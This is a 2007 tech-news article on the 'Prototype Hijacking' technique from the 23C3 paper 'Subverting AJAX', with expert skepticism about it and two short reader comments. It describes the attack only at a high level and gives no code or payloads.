Welcome!

AJAX & REA Authors: Yakov Fain, Andreas Grabner, Lori MacVittie, Kevin Hoffman, John Gannon

Related Topics: AJAX & REA, Virtualization

AJAX & REA: Article

Might "Prototype Hijacking" Subvert AJAX?

New ploy exploits sites with cross-site scripting holes
By Security News Desk
Article Rating:
January 7, 2007 12:45 PM EST
Reads:
 12,193
(SYS-CON Media) – Does JavaScript, which was never intended to do anything resembling what it does within the approach now called AJAX, have a fundamental design flaw? That's the question being asked by Stefano Di Paola and Giorgio Fedon. By using a new technique called "Prototype Hijacking," Di Paola and Fedon claim, it has been shown how it is possible to sniff and manipulate in real time asynchronous requests originating from any browser in a way which is transparent and independent from the framework used.

Their paper, "Subverting AJAX," was written for the 23rd Chaos Communication Conference, which took place at the Berliner Congress Center from 27-30 December, 2006. The conference has a weblog here: 23C3 Weblog.

The authors - Stefano Di Paola describes himself as a Senior Security Engineer while Fedon is currently employed as senior security consultant and penetration tester at Emaze Networks - conclude with the following thought, in somewhat broken English:

"As it seems, Web 2.0 applications will be more and more tightly tied to browser security, that is increasing in complexity and has to take care of a plethora of features that can be turned into weapons if controlled by a malicious attacker."
They describe what they call "a very interesting cache-injection technique" that permits attacks against the way asynchronous requests are made to be leveraged in a way that allows an attacker to poison almost permanently the web sites visited and stored into browser cache.

They also describe a new type of attack that bypasses even "restrictions imposed by web sites not vulnerable to XSS."

Experts however aren't  convinced. One who has checked the Opera, Safari and (Gecko-based) Camino browsers, writing on Slashdot, reports that they all "have completly separate sets of prototypes for each frame, so you can't circumvent XSS protection using prototypes."

As the Slashdot poster comments: "So it seems there's nothing to get excited about - you must have exploitable XSS vulnerability to begin with, so it's not the end of the internet just yet."

Published January 7, 2007 – Reads 12,193
Copyright © 2007 SYS-CON Media, Inc. — All Rights Reserved.
Syndicated stories and blog feeds, all rights reserved by the author.

More Stories By Security News Desk

SYS-CON's Security News desk trawls the world of security for news of software, hardware, products, and services that seems likely to be of interest to infosec professionals and summarizes them for easy assimilation by busy IT managers and staff.

Comments (2) View Comments

Share your thoughts on this story.

Add your comment
You must be signed in to add a comment. Sign-in | Register

In accordance with our Comment Policy, we encourage comments that are on topic, relevant and to-the-point. We will remove comments that include profanity, personal attacks, racial slurs, threats of violence, or other inappropriate material that violates our Terms and Conditions, and will block users who make repeated violations. We ask all readers to expect diversity of opinion and to treat one another with dignity and respect.

Most Recent Comments
stonecypher 01/07/07 07:08:10 AM EST

The fundamental flaw is not in Javscript. It's in current implementations of Javascript.
netsharc 01/07/07 06:36:47 AM EST

The problem isn't the use of Ajax (or XmlHttpRequest) itself is harmful, the problem is XSS-holes are harmful!